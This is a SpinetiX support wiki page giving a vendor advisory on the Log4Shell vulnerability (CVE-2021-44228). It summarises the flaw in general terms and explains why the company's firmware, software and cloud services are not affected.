Apache Log4j vulnerability
From SpinetiX Support Wiki
This article is related to Security.
The Log4j flaw (also now known as "Log4Shell") is a zero-day vulnerability that first came to light on 9th of December 2021, with warnings that it can allow unauthenticated remote code execution and access to servers.
Apache Log4j2 ≤ 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. [...]
Impact on SpinetiX products
SpinetiX has researched the exposure of SpinetiX firmware and software to the critical Log4j2 vulnerability CVE-2021-44228, a 0-day discovery affecting numerous systems worldwide, and we have concluded that none is affected. The log4j library is not used in any SpinetiX firmware or software, be it DSOS, Elementi, ARYA, Cockpit, or other cloud services.
- The Amazon Web Services (AWS) infrastructure used by SpinetiX does use Log4j2 in several of its services. AWS has rapidly addressed these vulnerabilities, and they are no longer impacted. All the details and timeline from AWS are available on this Update for Apache Log4j2 Issue (CVE-2021-44228) security bulletin.
- A related Apache log4cxx library, derived from Apache log4j 1.x, is used on DSOS and Elementi, but it does not include any support for the affected modules of log4j 2.x. Furthermore, DSOS only allows a very limited subset of log4cxx functionality to be configured and only plain file appenders can be used. Elementi does not provide any means to configure the logging configuration.